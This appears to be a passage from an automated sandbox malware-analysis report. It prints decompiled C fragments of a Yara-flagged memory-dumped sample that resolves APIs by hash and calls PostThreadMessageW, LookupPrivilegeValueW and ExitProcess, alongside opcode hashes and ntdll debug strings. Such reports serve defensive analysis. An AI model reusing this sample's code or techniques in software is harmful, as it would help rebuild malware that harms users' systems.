                                                      				long _t26;
                                                      				intOrPtr _t29;
                                                      				int _t31;
                                                      				unsigned char _t43;
                                                      
                                                      				_t23 = __edx;
                                                      				asm("in eax, dx");
                                                      				 *__ecx =  *__ecx & __ecx;
                                                      				_v68 = 0;
                                                      				E0041BA20( &_v67, 0, 0x3f);
                                                      				_t4 = _t23 + 3;
                                                      				 *_t4 =  *(_t23 + 3) >> 0x51;
                                                      				_t43 =  *_t4;
                                                      				E0041C5C0();
                                                      				_t29 = _a4;
                                                      				_t15 = E0040ACC0(_t43, _t29 + 0x1c,  &_v68); // executed
                                                      				_t16 = E00414E10(_t29 + 0x1c, _t15, 0, 0, 0xc4e7b6d6);
                                                      				_t31 = _t16;
                                                      				if(_t31 != 0) {
                                                      					_push(0xec8b553c);
                                                      					_t26 = _a8;
                                                      					_t16 = PostThreadMessageW(_t26, 0x111, 0, 0); // executed
                                                      					_t45 = _t16;
                                                      					if(_t16 == 0) {
                                                      						_t16 =  *_t31(_t26, 0x8003,  &_v5 + (E0040A450(_t45, 1, 8) & 0x000000ff) - 0x40, _t16);
                                                      					}
                                                      				}
                                                      				return _t16;
                                                      			}














                                                      APIs
                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 68%
                                                      			E004082F0(void* __edx, intOrPtr _a4, long _a8) {
                                                      				char _v5;
                                                      				char _v67;
                                                      				char _v68;
                                                      				void* _t14;
                                                      				intOrPtr* _t15;
                                                      				int _t16;
                                                      				void* _t21;
                                                      				long _t24;
                                                      				intOrPtr _t26;
                                                      				intOrPtr* _t28;
                                                      				unsigned char _t33;
                                                      
                                                      				_t21 = __edx;
                                                      				_v68 = 0;
                                                      				E0041BA20( &_v67, 0, 0x3f);
                                                      				_t4 = _t21 + 3;
                                                      				 *_t4 =  *(_t21 + 3) >> 0x51;
                                                      				_t33 =  *_t4;
                                                      				E0041C5C0();
                                                      				_t26 = _a4;
                                                      				_t14 = E0040ACC0(_t33, _t26 + 0x1c,  &_v68); // executed
                                                      				_t15 = E00414E10(_t26 + 0x1c, _t14, 0, 0, 0xc4e7b6d6);
                                                      				_t28 = _t15;
                                                      				if(_t28 != 0) {
                                                      					_t24 = _a8;
                                                      					_t16 = PostThreadMessageW(_t24, 0x111, 0, 0); // executed
                                                      					_t35 = _t16;
                                                      					if(_t16 == 0) {
                                                      						_t16 =  *_t28(_t24, 0x8003,  &_v5 + (E0040A450(_t35, 1, 8) & 0x000000ff) - 0x40, _t16);
                                                      					}
                                                      					return _t16;
                                                      				}
                                                      				return _t15;
                                                      			}















                                                      APIs
                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A25D
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 57%
                                                      			E00408373(void* __edx) {
                                                      				void* _t9;
                                                      				int _t10;
                                                      				long _t17;
                                                      				intOrPtr _t19;
                                                      				int _t21;
                                                      				void* _t23;
                                                      				void* _t24;
                                                      				unsigned char _t30;
                                                      
                                                      				asm("sbb ebp, ecx");
                                                      				_t24 = _t23 - 1;
                                                      				_t1 = __edx + 3;
                                                      				 *_t1 =  *(__edx + 3) >> 0x51;
                                                      				_t30 =  *_t1;
                                                      				E0041C5C0();
                                                      				_t19 =  *((intOrPtr*)(_t24 + 8));
                                                      				_t9 = E0040ACC0(_t30, _t19 + 0x1c, _t24 - 0x40); // executed
                                                      				_t10 = E00414E10(_t19 + 0x1c, _t9, 0, 0, 0xc4e7b6d6);
                                                      				_t21 = _t10;
                                                      				if(_t21 != 0) {
                                                      					_t17 =  *(_t24 + 0xc);
                                                      					_t10 = PostThreadMessageW(_t17, 0x111, 0, 0); // executed
                                                      					_t32 = _t10;
                                                      					if(_t10 == 0) {
                                                      						_t10 =  *_t21(_t17, 0x8003, _t24 + (E0040A450(_t32, 1, 8) & 0x000000ff) - 0x40, _t10);
                                                      					}
                                                      				}
                                                      				return _t10;
                                                      			}












                                                      APIs
                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 75%
                                                      			E004082B3(void* __esi) {
                                                      				void* _t5;
                                                      				int _t6;
                                                      				long _t12;
                                                      				int _t16;
                                                      				void* _t18;
                                                      				void* _t24;
                                                      
                                                      				_t5 = E0040ACC0(_t24, __esi + 0x1c, _t18 - 0x40); // executed
                                                      				_t6 = E00414E10(__esi + 0x1c, _t5, 0, 0, 0xc4e7b6d6);
                                                      				_t16 = _t6;
                                                      				if(_t16 != 0) {
                                                      					_t12 =  *(_t18 + 0xc);
                                                      					_t6 = PostThreadMessageW(_t12, 0x111, 0, 0); // executed
                                                      					_t26 = _t6;
                                                      					if(_t6 == 0) {
                                                      						_t6 =  *_t16(_t12, 0x8003, _t18 + (E0040A450(_t26, 1, 8) & 0x000000ff) - 0x40, _t6);
                                                      					}
                                                      				}
                                                      				return _t6;
                                                      			}










                                                      APIs
                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: 17a38464d72613c1942b7b43a1cc9293874683b177593362508ebfcb078e09f7
                                                      • Instruction ID: 04c9ba4c817a4b39796bfa22603aea6b38b32933f0f46f205ba64fe2c064927a
                                                      • Opcode Fuzzy Hash: 17a38464d72613c1942b7b43a1cc9293874683b177593362508ebfcb078e09f7
                                                      • Instruction Fuzzy Hash: 25F08231B806243AE62065955D43FBF66186B80F15F15412EFF04FA2C1EAFD291606EA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A3C0
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      • Opcode ID: dae679a2c8e472f8eba74482c5ff138022dd817cd9814bccb7c796c2c0c9fc86
                                                      • Instruction ID: f81da64547fe679c07cba3092e1a56531ae0b8d8bfc0ede6110c9ce11a4a5771
                                                      • Opcode Fuzzy Hash: dae679a2c8e472f8eba74482c5ff138022dd817cd9814bccb7c796c2c0c9fc86
                                                      • Instruction Fuzzy Hash: 09E06DB1200218BBCA10EF99DC80EDB37AA9F84724F108566FA086B741C934F850CBF5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 30%
                                                      			E0041A230(void* __ebx, signed int __ecx, void* __edx, void* __esi, void* _a4, void* _a8, long _a12, void* _a16) {
                                                      				void* _v3;
                                                      				char _t15;
                                                      				void* _t22;
                                                      
                                                      				 *(__ebx + 0x6a561048) =  *(__ebx + 0x6a561048) | __ecx;
                                                      				 *((intOrPtr*)(__esi + 0x50)) =  *((intOrPtr*)(__esi + 0x50)) + __edx;
                                                      				E0041AB20(_t22);
                                                      				_t15 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                      				return _t15;
                                                      			}







                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A25D
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                      • Instruction ID: 9eb97300d5e10087c94d33d02e30a743291ab6cce32cf35ae9b88dc6f9268b02
                                                      • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                      • Instruction Fuzzy Hash: 0EE01AB12002046BD714DF59DC45EA777ADAF88754F014559BA0857241C630F910CAB0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A3C0
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                      • Instruction ID: bf4187e38ed515452a76a24d05e88418ebf87a1f9c5c0c5d517d21230e680a96
                                                      • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                      • Instruction Fuzzy Hash: DEE01AB12002086BDB10DF49DC85EE737ADAF88654F018155BA0857241C934F8108BF5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A3C0
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      • Opcode ID: 5da8310e1d07f192b56cb8cba9071fc35e5510fd99ef5d8f3cf2f35ea9e925c3
                                                      • Instruction ID: c16ce2f19ca2d23fbb7dae673e92ec723c1f6492d3f47f4ff7a76828f41699ed
                                                      • Opcode Fuzzy Hash: 5da8310e1d07f192b56cb8cba9071fc35e5510fd99ef5d8f3cf2f35ea9e925c3
                                                      • Instruction Fuzzy Hash: F3E08CB4104285EBC700EF28E890CEBBB2ADF852143108047F80983202C334E930CBB2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0041A270(intOrPtr _a4, int _a8) {
                                                      				void* _t10;
                                                      				void* _t11;
                                                      
                                                      				E0041AB20(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_a4 + 0xa14)), 0, 0x36, _t11);
                                                      				ExitProcess(_a8);
                                                      			}





                                                      0x0041a28a
                                                      0x0041a298

                                                      APIs
                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A298
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                      • Instruction ID: 654422823446a6dc42c61fec1171b68ac592b5503343b56bfda4b4a103558910
                                                      • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                      • Instruction Fuzzy Hash: 1FD017726042187BD620EB99DC85FD777ADDF487A4F0180AABA1C6B242C531BA10CBE1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 30%
                                                      			E0041A234(void* __eax, void* __ebx, signed int __ecx, void* __edx, void* __esi) {
                                                      				char _t14;
                                                      				void* _t21;
                                                      				void* _t24;
                                                      
                                                      				_t25 = _t24 + 1;
                                                      				 *(__ebx + 0x6a561048) =  *(__ebx + 0x6a561048) | __ecx;
                                                      				 *((intOrPtr*)(__esi + 0x50)) =  *((intOrPtr*)(__esi + 0x50)) + __edx;
                                                      				E0041AB20(_t21);
                                                      				_t14 = RtlFreeHeap( *(_t24 + 0xd),  *(_t24 + 0x11),  *(_t25 + 0x14)); // executed
                                                      				return _t14;
                                                      			}







                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A25D
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: 407736451d95f8e1ab8699c3872c8790593c26f10a37ddf22fb502eee4eedece
                                                      • Instruction ID: fcb3eeebfb7adec86ef2b62e20fe7d7f81c34a93cc2729fa91ca5bbf877f4bee
                                                      • Opcode Fuzzy Hash: 407736451d95f8e1ab8699c3872c8790593c26f10a37ddf22fb502eee4eedece
                                                      • Instruction Fuzzy Hash: EAD02BB81042845BDB10EF69E8C089B37D5BF803187108A4BFC5C47303C130E869CBB1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 0db4f55efd2fc650b74e2ce093525a20a929cfc341adfb8f1729b69041f1adbb
                                                      • Instruction ID: f7c643861ef5564493646191c02feeeb7af93e8d146f5df96eb580dfaed93c80
                                                      • Opcode Fuzzy Hash: 0db4f55efd2fc650b74e2ce093525a20a929cfc341adfb8f1729b69041f1adbb
                                                      • Instruction Fuzzy Hash: FBB09B729054C5C9D621D7A4860C717F94077D4745F17C066D3020651B4778C0D1F5B6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Strings
                                                      • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0185B305
                                                      • a NULL pointer, xrefs: 0185B4E0
                                                      • *** then kb to get the faulting stack, xrefs: 0185B51C
                                                      • *** Resource timeout (%p) in %ws:%s, xrefs: 0185B352
                                                      • The instruction at %p referenced memory at %p., xrefs: 0185B432
                                                      • *** Inpage error in %ws:%s, xrefs: 0185B418
                                                      • write to, xrefs: 0185B4A6
                                                      • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0185B2DC
                                                      • Go determine why that thread has not released the critical section., xrefs: 0185B3C5
                                                      • *** enter .exr %p for the exception record, xrefs: 0185B4F1
                                                      • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0185B3D6
                                                      • This failed because of error %Ix., xrefs: 0185B446
                                                      • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0185B47D
                                                      • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0185B2F3
                                                      • *** An Access Violation occurred in %ws:%s, xrefs: 0185B48F
                                                      • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0185B38F
                                                      • The resource is owned exclusively by thread %p, xrefs: 0185B374
                                                      • an invalid address, %p, xrefs: 0185B4CF
                                                      • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0185B484
                                                      • The critical section is owned by thread %p., xrefs: 0185B3B9
                                                      • read from, xrefs: 0185B4AD, 0185B4B2
                                                      • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0185B476
                                                      • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0185B53F
                                                      • The instruction at %p tried to %s , xrefs: 0185B4B6
                                                      • <unknown>, xrefs: 0185B27E, 0185B2D1, 0185B350, 0185B399, 0185B417, 0185B48E
                                                      • The resource is owned shared by %d threads, xrefs: 0185B37E
                                                      • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0185B314
                                                      • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0185B323
                                                      • *** enter .cxr %p for the context, xrefs: 0185B50D
                                                      • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0185B39B
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • API String ID: 0-108210295
                                                      • Opcode ID: d156acb15747a40286d8645e88f39fd3595c85317210641b4a69306c2ca4d7f7
                                                      • Instruction ID: acf658629af85367709d14d6cd505f05f29d9076e028590257a2d442d72fef26
                                                      • Opcode Fuzzy Hash: d156acb15747a40286d8645e88f39fd3595c85317210641b4a69306c2ca4d7f7
                                                      • Instruction Fuzzy Hash: 278105B1A40200FFDF369A4ADC96D7B7F67EFA6B55F440048F904AB212D2618751C7B2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 44%
                                                      			E01861C06() {
                                                      				signed int _t27;
                                                      				char* _t104;
                                                      				char* _t105;
                                                      				intOrPtr _t113;
                                                      				intOrPtr _t115;
                                                      				intOrPtr _t117;
                                                      				intOrPtr _t119;
                                                      				intOrPtr _t120;
                                                      
                                                      				_t105 = 0x17848a4;
                                                      				_t104 = "HEAP: ";
                                                      				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                      					_push(_t104);
                                                      					E017AB150();
                                                      				} else {
                                                      					E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                      				}
                                                      				_push( *0x189589c);
                                                      				E017AB150("Heap error detected at %p (heap handle %p)\n",  *0x18958a0);
                                                      				_t27 =  *0x1895898; // 0x0
                                                      				if(_t27 <= 0xf) {
                                                      					switch( *((intOrPtr*)(_t27 * 4 +  &M01861E96))) {
                                                      						case 0:
                                                      							_t105 = "heap_failure_internal";
                                                      							goto L21;
                                                      						case 1:
                                                      							goto L21;
                                                      						case 2:
                                                      							goto L21;
                                                      						case 3:
                                                      							goto L21;
                                                      						case 4:
                                                      							goto L21;
                                                      						case 5:
                                                      							goto L21;
                                                      						case 6:
                                                      							goto L21;
                                                      						case 7:
                                                      							goto L21;
                                                      						case 8:
                                                      							goto L21;
                                                      						case 9:
                                                      							goto L21;
                                                      						case 0xa:
                                                      							goto L21;
                                                      						case 0xb:
                                                      							goto L21;
                                                      						case 0xc:
                                                      							goto L21;
                                                      						case 0xd:
                                                      							goto L21;
                                                      						case 0xe:
                                                      							goto L21;
                                                      						case 0xf:
                                                      							goto L21;
                                                      					}
                                                      				}
                                                      				L21:
                                                      				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                      					_push(_t104);
                                                      					E017AB150();
                                                      				} else {
                                                      					E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                      				}
                                                      				_push(_t105);
                                                      				E017AB150("Error code: %d - %s\n",  *0x1895898);
                                                      				_t113 =  *0x18958a4; // 0x0
                                                      				if(_t113 != 0) {
                                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                      						_push(_t104);
                                                      						E017AB150();
                                                      					} else {
                                                      						E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                      					}
                                                      					E017AB150("Parameter1: %p\n",  *0x18958a4);
                                                      				}
                                                      				_t115 =  *0x18958a8; // 0x0
                                                      				if(_t115 != 0) {
                                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                      						_push(_t104);
                                                      						E017AB150();
                                                      					} else {
                                                      						E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                      					}
                                                      					E017AB150("Parameter2: %p\n",  *0x18958a8);
                                                      				}
                                                      				_t117 =  *0x18958ac; // 0x0
                                                      				if(_t117 != 0) {
                                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                      						_push(_t104);
                                                      						E017AB150();
                                                      					} else {
                                                      						E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                      					}
                                                      					E017AB150("Parameter3: %p\n",  *0x18958ac);
                                                      				}
                                                      				_t119 =  *0x18958b0; // 0x0
                                                      				if(_t119 != 0) {
                                                      					L41:
                                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                      						_push(_t104);
                                                      						E017AB150();
                                                      					} else {
                                                      						E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                      					}
                                                      					_push( *0x18958b4);
                                                      					E017AB150("Last known valid blocks: before - %p, after - %p\n",  *0x18958b0);
                                                      				} else {
                                                      					_t120 =  *0x18958b4; // 0x0
                                                      					if(_t120 != 0) {
                                                      						goto L41;
                                                      					}
                                                      				}
                                                      				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                      					_push(_t104);
                                                      					E017AB150();
                                                      				} else {
                                                      					E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                      				}
                                                      				return E017AB150("Stack trace available at %p\n", 0x18958c0);
                                                      			}

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                      • API String ID: 0-2897834094
                                                      • Opcode ID: 809418154b7d69afe69c2cac46422c544604145cb16014999f6a0ab0bd4bbc60
                                                      • Instruction ID: 1a7f6bb0392e9d68d3282a2c04e57932aff82895a72b6c5a4d076b0e440544a7
                                                      • Opcode Fuzzy Hash: 809418154b7d69afe69c2cac46422c544604145cb16014999f6a0ab0bd4bbc60
                                                      • Instruction Fuzzy Hash: BA61E833955149DFD721EB49E8DCD25F3A8E794B20B49813EF409AF316DA249A40CF0A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 96%
                                                      			E017B3D34(signed int* __ecx) {
                                                      				signed int* _v8;
                                                      				char _v12;
                                                      				signed int* _v16;
                                                      				signed int* _v20;
                                                      				char _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				char _v36;
                                                      				signed int _v40;
                                                      				signed int _v44;
                                                      				signed int* _v48;
                                                      				signed int* _v52;
                                                      				signed int _v56;
                                                      				signed int _v60;
                                                      				char _v68;
                                                      				signed int _t140;
                                                      				signed int _t161;
                                                      				signed int* _t236;
                                                      				signed int* _t242;
                                                      				signed int* _t243;
                                                      				signed int* _t244;
                                                      				signed int* _t245;
                                                      				signed int _t255;
                                                      				void* _t257;
                                                      				signed int _t260;
                                                      				void* _t262;
                                                      				signed int _t264;
                                                      				void* _t267;
                                                      				signed int _t275;
                                                      				signed int* _t276;
                                                      				short* _t277;
                                                      				signed int* _t278;
                                                      				signed int* _t279;
                                                      				signed int* _t280;
                                                      				short* _t281;
                                                      				signed int* _t282;
                                                      				short* _t283;
                                                      				signed int* _t284;
                                                      				void* _t285;
                                                      
                                                      				_v60 = _v60 | 0xffffffff;
                                                      				_t280 = 0;
                                                      				_t242 = __ecx;
                                                      				_v52 = __ecx;
                                                      				_v8 = 0;
                                                      				_v20 = 0;
                                                      				_v40 = 0;
                                                      				_v28 = 0;
                                                      				_v32 = 0;
                                                      				_v44 = 0;
                                                      				_v56 = 0;
                                                      				_t275 = 0;
                                                      				_v16 = 0;
                                                      				if(__ecx == 0) {
                                                      					_t280 = 0xc000000d;
                                                      					_t140 = 0;
                                                      					L50:
                                                      					 *_t242 =  *_t242 | 0x00000800;
                                                      					_t242[0x13] = _t140;
                                                      					_t242[0x16] = _v40;
                                                      					_t242[0x18] = _v28;
                                                      					_t242[0x14] = _v32;
                                                      					_t242[0x17] = _t275;
                                                      					_t242[0x15] = _v44;
                                                      					_t242[0x11] = _v56;
                                                      					_t242[0x12] = _v60;
                                                      					return _t280;
                                                      				}
                                                      				if(E017B1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                                      					_v56 = 1;
                                                      					if(_v8 != 0) {
                                                      						L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                                      					}
                                                      					_v8 = _t280;
                                                      				}
                                                      				if(E017B1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                                      					_v60 =  *_v8;
                                                      					L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                                      					_v8 = _t280;
                                                      				}
                                                      				if(E017B1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                      					L16:
                                                      					if(E017B1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                      						L28:
                                                      						if(E017B1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                                      							L46:
                                                      							_t275 = _v16;
                                                      							L47:
                                                      							_t161 = 0;
                                                      							L48:
                                                      							if(_v8 != 0) {
                                                      								L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                                      							}
                                                      							_t140 = _v20;
                                                      							if(_t140 != 0) {
                                                      								if(_t275 != 0) {
                                                      									L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                      									_t275 = 0;
                                                      									_v28 = 0;
                                                      									_t140 = _v20;
                                                      								}
                                                      							}
                                                      							goto L50;
                                                      						}
                                                      						_t167 = _v12;
                                                      						_t255 = _v12 + 4;
                                                      						_v44 = _t255;
                                                      						if(_t255 == 0) {
                                                      							_t276 = _t280;
                                                      							_v32 = _t280;
                                                      						} else {
                                                      							_t276 = L017C4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                                      							_t167 = _v12;
                                                      							_v32 = _t276;
                                                      						}
                                                      						if(_t276 == 0) {
                                                      							_v44 = _t280;
                                                      							_t280 = 0xc0000017;
                                                      							goto L46;
                                                      						} else {
                                                      							E017EF3E0(_t276, _v8, _t167);
                                                      							_v48 = _t276;
                                                      							_t277 = E017F1370(_t276, 0x1784e90);
                                                      							_pop(_t257);
                                                      							if(_t277 == 0) {
                                                      								L38:
                                                      								_t170 = _v48;
                                                      								if( *_v48 != 0) {
                                                      									E017EBB40(0,  &_v68, _t170);
                                                      									if(L017B43C0( &_v68,  &_v24) != 0) {
                                                      										_t280 =  &(_t280[0]);
                                                      									}
                                                      								}
                                                      								if(_t280 == 0) {
                                                      									_t280 = 0;
                                                      									L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                                      									_v44 = 0;
                                                      									_v32 = 0;
                                                      								} else {
                                                      									_t280 = 0;
                                                      								}
                                                      								_t174 = _v8;
                                                      								if(_v8 != 0) {
                                                      									L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                                      								}
                                                      								_v8 = _t280;
                                                      								goto L46;
                                                      							}
                                                      							_t243 = _v48;
                                                      							do {
                                                      								 *_t277 = 0;
                                                      								_t278 = _t277 + 2;
                                                      								E017EBB40(_t257,  &_v68, _t243);
                                                      								if(L017B43C0( &_v68,  &_v24) != 0) {
